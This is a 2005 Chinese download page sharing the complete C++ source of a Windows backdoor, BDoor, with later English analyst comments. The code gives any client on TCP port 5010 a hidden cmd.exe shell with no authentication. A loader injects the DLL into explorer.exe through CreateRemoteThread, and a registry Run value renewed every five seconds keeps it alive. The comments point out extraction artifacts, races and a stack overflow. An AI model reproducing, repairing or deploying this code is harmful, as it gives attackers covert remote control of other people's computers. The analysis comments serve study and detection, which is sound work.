后门程序BDoor及源码 选择自 的 Blog
提交时间:2005-04-22
提交用户:
工具分类:后门程序
运行平台:Windows
工具大小:316825 Bytes
文件MD5 :95e120d97967a3679dfdbd82985ea1ca
工具来源:这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。
// BDoor.cpp : Defines the entry point for the DLL application.
//
// Analyst note: this is the payload half of a 2005-era Windows backdoor.
// Once loaded into explorer.exe (by DllInjection.cpp, further down this page)
// it listens on TCP port PORT with no authentication, hands every client a
// hidden cmd.exe, and re-registers its loader under HKLM\...\Run every 5 s.
// The code is shown here for analysis; nothing below is fixed or hardened.
//#include "stdafx.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32")

// TCP port the backdoor listens on (bound to every local address in ControlThread).
#define PORT 5010

// Run key used for persistence.
// NOTE(review): the "//" separators look like an extraction artifact for "\\";
// as written this path will not open.
#define REG_RUN "SOFTWARE//Microsoft//Windows//CurrentVersion//Run"

// Per-connection state handed to RecvThread / SendThread: the client socket
// plus the anonymous-pipe end that thread writes to (RecvThread) or reads from
// (SendThread).
struct THREADPARAM
{
    SOCKET sock;
    HANDLE handle;
};

DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);
DWORD WINAPI RecvThread(void *lp);
DWORD WINAPI SendThread(void *lp);
DWORD WINAPI WriteReg(void *no);

// DLL entry point. On DLL_PROCESS_ATTACH it starts ControlThread and returns;
// nothing is done on DLL_PROCESS_DETACH, so the listener and the persistence
// thread are never stopped. The DLL is loaded into explorer.exe by the
// injector (DllInjection.cpp), so everything below runs inside that process.
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            // Thread created from DllMain (loader lock held); the handle is
            // never closed.
            ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
            break;
        }
    case DLL_PROCESS_DETACH:
        {
            break;
        }
    }
    return TRUE;
}

// Listener / acceptor thread. Starts the persistence thread (WriteReg), binds
// TCP port PORT on every local address (sin_addr is set to 0, i.e. INADDR_ANY)
// and spawns one BDoor thread per accepted connection. There is no
// authentication anywhere on this path: any client that can reach the port
// gets a cmd.exe session.
// Returns -1 on WSAStartup / socket / bind failure; the accept loop never exits.
DWORD WINAPI ControlThread(void *no)
{
    CreateThread(NULL,0,WriteReg,NULL,0,NULL);   // persistence, handle never closed
    WSADATA wsaData;
    SOCKET listenSock;
    if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
    {
        return -1;
    }
    if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        return -1;
    }
    // Neither address is zero-initialised; only three fields of localAddr are set.
    sockaddr_in localAddr,inAddr;
    int addrLen=sizeof(inAddr);
    localAddr.sin_addr.S_un.S_addr=0;
    localAddr.sin_family=AF_INET;
    localAddr.sin_port=htons(PORT);
    if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
    {
        closesocket(listenSock);
        return -1;
    }
    listen(listenSock,5);   // return value unchecked
    while(TRUE)
    {
        // BUG: the new thread is given a pointer to this stack variable, which
        // the next accept() overwrites; the Sleep(100) below is the only thing
        // keeping BDoor from reading the wrong socket. accept() failure
        // (INVALID_SOCKET) is not checked either.
        SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
        DWORD ID;
        CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
        Sleep(100);
    }
    // Unreachable: the loop above never terminates.
    closesocket(listenSock);
    ::WSACleanup();
}

// Persistence thread. Builds "<system dir>/DllInjection.exe" and then, every
// five seconds for the life of the host process, rewrites it into the Run key
// under the value name "sysDll" so the injector is launched at logon.
// Detection: a Run value "sysDll" pointing at DllInjection.exe in the system
// directory that reappears within seconds of being deleted. Writing HKLM
// normally requires administrative rights.
// NOTE(review): as extracted, the separator is the two-character string "//"
// and '//' is a multi-character constant (compiler warning); the original
// almost certainly used "\\" / '\\'. A failed RegOpenKey spins with no delay,
// and the REG_SZ is written with len == strlen(), i.e. without its NUL.
DWORD WINAPI WriteReg(void *no)
{
    char sysPath[MAX_PATH]={0};
    int ret=::GetSystemDirectory(sysPath,MAX_PATH);
    // If GetSystemDirectory fails (ret==0) this indexes sysPath[-1].
    if(sysPath[ret-1]!='//') strcat(sysPath,"//");
    strcat(sysPath,"DllInjection.exe");
    int len=strlen(sysPath);
    while(TRUE)
    {
        HKEY hKey;
        if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS) continue;
        ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);
        ::RegCloseKey(hKey);
        Sleep(5000);
    }
    return 0;   // unreachable
}

// Per-connection shell session. Launches a hidden cmd.exe with stdin and
// stdout/stderr redirected through two anonymous pipes, then runs RecvThread
// (socket -> shell stdin) and SendThread (shell stdout -> socket) until the
// client disconnects or sends the "exit" line. On exit it kills the shell and
// the send thread and closes the socket and the two surviving pipe ends.
// lp points at the accepted SOCKET, which lives on ControlThread's stack (see
// the race noted there). Returns -1 if CreateProcess fails — leaking all four
// pipe handles and the socket — and 0 otherwise.
DWORD WINAPI BDoor(void *lp)
{
    SOCKET sock=*((SOCKET *)lp);
    HANDLE hCmdOut,hCmdIn,hRead,hWrite;
    SECURITY_ATTRIBUTES sec={0};
    sec.nLength=sizeof(sec);
    sec.lpSecurityDescriptor=NULL;
    sec.bInheritHandle=TRUE;   // both ends of both pipes become inheritable; CreatePipe results unchecked
    CreatePipe(&hCmdIn,&hWrite,&sec,0);    // this side writes hWrite, cmd.exe reads hCmdIn
    CreatePipe(&hRead,&hCmdOut,&sec,0);    // cmd.exe writes hCmdOut, this side reads hRead
    char cmdDir[MAX_PATH]={0};
    ::GetSystemDirectory(cmdDir,MAX_PATH);
    // Same "//" vs "\\" extraction artifact as in WriteReg.
    if(cmdDir[strlen(cmdDir)-1]!='//') strcat(cmdDir,"//");
    strcat(cmdDir,"cmd.exe");
    STARTUPINFO startUpInfo={0};
    startUpInfo.cb=sizeof(startUpInfo);
    startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    startUpInfo.wShowWindow=SW_HIDE;
    startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
    startUpInfo.hStdInput=hCmdIn;
    PROCESS_INFORMATION processInfo={0};
    // bInheritHandles=TRUE: the shell inherits every inheritable handle of the
    // host process, not only the three pipe ends it is given.
    int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
    if(ret==0)
    {
        return -1;
    }
    // Close the child's ends in this process (presumably so EOF can propagate
    // once cmd.exe exits).
    CloseHandle(hCmdIn);
    CloseHandle(hCmdOut);
    DWORD ID1,ID2;
    HANDLE hRecvThread,hSendThread;
    THREADPARAM recvParam={0},sendParam={0};
    recvParam.sock=sock;
    recvParam.handle=hWrite;
    hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
    sendParam.sock=sock;
    sendParam.handle=hRead;
    hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
    ULONG code;
    // Block until the client side ends the session, then tear everything down.
    ::WaitForSingleObject(hRecvThread,INFINITE);
    ::GetExitCodeThread(hSendThread,&code);
    ::TerminateThread(hSendThread,code);   // forced kill: SendThread has no exit path of its own
    ::GetExitCodeProcess(processInfo.hProcess,&code);
    ::TerminateProcess(processInfo.hProcess,code);
    closesocket(sock);
    CloseHandle(hWrite);
    CloseHandle(hRead);
    // Leaked: hRecvThread, hSendThread, processInfo.hProcess, processInfo.hThread.
    return 0;
}

// Socket -> shell. Reads the connection one byte at a time, echoes each byte
// back to the client, appends it to cmd, and on the line terminator hands the
// accumulated line to cmd.exe's stdin. A line equal (case-insensitively) to
// the "exit" literal ends the session instead. Returns 0 when the peer closes
// the connection or sends "exit".
// BUG: cmd is 256 bytes and strcat() is unbounded, so any input longer than
// 255 bytes without a terminator overruns this thread's stack inside
// explorer.exe — reachable by any unauthenticated client. recv() errors
// (SOCKET_ERROR, i.e. -1) match neither branch, so a broken socket makes the
// loop spin forever.
// NOTE(review): '/n' is a multi-character constant and "exit/r/n" a plain
// string as extracted; the original presumably used '\n' / "exit\r\n".
DWORD WINAPI RecvThread(void *lp)
{
    char cmd[256]={0};
    THREADPARAM param=*((THREADPARAM *)lp);   // copied out; lp points into BDoor's frame
    while(1)
    {
        char temp[2]={0};
        int ret=recv(param.sock,temp,1,0);
        if(ret==0)
        {
            break;   // orderly close by the peer
        }
        else if(ret==1)
        {
            send(param.sock,temp,1,0);   // echo the byte back
            strcat(cmd,temp);
            if(temp[0]=='/n')
            {
                if(_stricmp(cmd,"exit/r/n")==0)
                {
                    break;
                }
                ULONG len;
                ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
                memset(cmd,0,256);
            }
        }
    }
    return 0;
}

// Shell -> socket. Polls the shell's stdout pipe every 100 ms; whenever data
// is pending, reads up to 1024 bytes and forwards them to the client.
// The loop has no exit condition: the thread runs until BDoor calls
// TerminateThread on it. PeekNamedPipe / ReadFile / send results are unchecked.
DWORD WINAPI SendThread(void *lp)
{
    THREADPARAM param=*((THREADPARAM *)lp);
    char buf[1024]={0};
    while(1)
    {
        ULONG len=0;
        ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
        if(len>0)
        {
            ::ReadFile(param.handle,buf,1024,&len,NULL);
            send(param.sock,buf,len,0);
            memset(buf,0,1024);
        }
        Sleep(100);
    }
    return 0;   // unreachable
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// DllInjection.cpp : Defines the entry point for the application.
//
// Analyst note: loader half of the backdoor. It is what the "sysDll" Run value
// maintained by BDoor.dll (WriteReg, above) launches at logon; its only job is
// to load <system dir>/BDoor.dll into explorer.exe via CreateRemoteThread.
//#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"

long GetProcessID(char *processName);
// Injector entry point. Sleeps 5 s (presumably to let the desktop finish
// starting after logon), locates explorer.exe, and loads <system dir>/BDoor.dll
// into it with the classic VirtualAllocEx + WriteProcessMemory +
// CreateRemoteThread(LoadLibraryA) sequence. The remote buffer holding the DLL
// path is decommitted 100 ms later whether or not the remote LoadLibraryA has
// run yet.
// Returns 0 once CreateRemoteThread has been called, -1 on any earlier failure.
// NOTE(review): pThreadProc is the address of LoadLibraryA in *this* process;
// the injection only works if kernel32.dll is mapped at the same base inside
// explorer.exe. That held on the systems this targeted but not under ASLR —
// TODO confirm for the platform being analysed.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    // TODO: Place code here.
    Sleep(5000);
    long ID=GetProcessID("explorer");
    if(ID==-1) return -1;
    HINSTANCE hDll;
    HINSTANCE (* pProc)(LPCTSTR);
    DWORD (WINAPI * pThreadProc)(void *);
    if((hDll=::LoadLibrary("kernel32.dll"))==NULL) return -1;
    if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL) return -1;
    pThreadProc=(DWORD (WINAPI *)(void *))pProc;
    // Full access to explorer.exe; the handle is marked inheritable (TRUE).
    HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
    if(hProcess==NULL) return -1;
    char pDllPath[MAX_PATH]={0};
    char *pRemoteAddr=NULL;
    int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
    // "//" appears to be an extraction artifact for "\\" (same as in BDoor.cpp);
    // if GetSystemDirectory fails (ret==0) this indexes pDllPath[-1].
    if(pDllPath[ret-1]!='//') strcat(pDllPath,"//");
    strcat(pDllPath,"BDoor.dll");
    if(::_access(pDllPath,0)==-1) return -1;   // the DLL must already be on disk
    // strlen+1 bytes are allocated but only strlen are written; the terminating
    // NUL relies on the freshly committed page being zero-filled.
    pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE);
    if(pRemoteAddr==NULL) return -1;
    ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
    if(ret==0) return -1;
    // The remote thread handle is neither checked nor closed, and nothing waits
    // for it before the path buffer is decommitted below.
    HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
    Sleep(100);
    ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT);
    ::CloseHandle(hProcess);
    return 0;
}

// Returns the PID of the first running process whose executable base name
// (path and extension stripped by _splitpath) equals processName, compared
// case-insensitively; -1 if the snapshot or Process32First fails or nothing
// matches.
// NOTE(review): CreateToolhelp32Snapshot signals failure with
// INVALID_HANDLE_VALUE, not NULL, so the check below never fires; and the
// snapshot handle is never closed on any path.
long GetProcessID(char *processName)
{
    HANDLE hSnapshot;
    PROCESSENTRY32 pe32={0};
    BOOL fRet;
    hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hSnapshot==NULL) return -1;
    pe32.dwSize=sizeof(PROCESSENTRY32);
    fRet=Process32First(hSnapshot,&pe32);
    if(!fRet) return -1;
    int g=0;   // set to 1 when a match is found
    char drive[_MAX_DRIVE]={0};
    char dir[_MAX_DIR]={0};
    char fname[_MAX_FNAME]={0};
    char ext[_MAX_EXT]={0};
    do
    {
        _splitpath(pe32.szExeFile,drive,dir,fname,ext);
        if(_stricmp(processName,fname)==0)
        {
            g=1;
            break;
        }
    }while(Process32Next(hSnapshot,&pe32));
    if(g!=1) return -1;
    return pe32.th32ProcessID;
}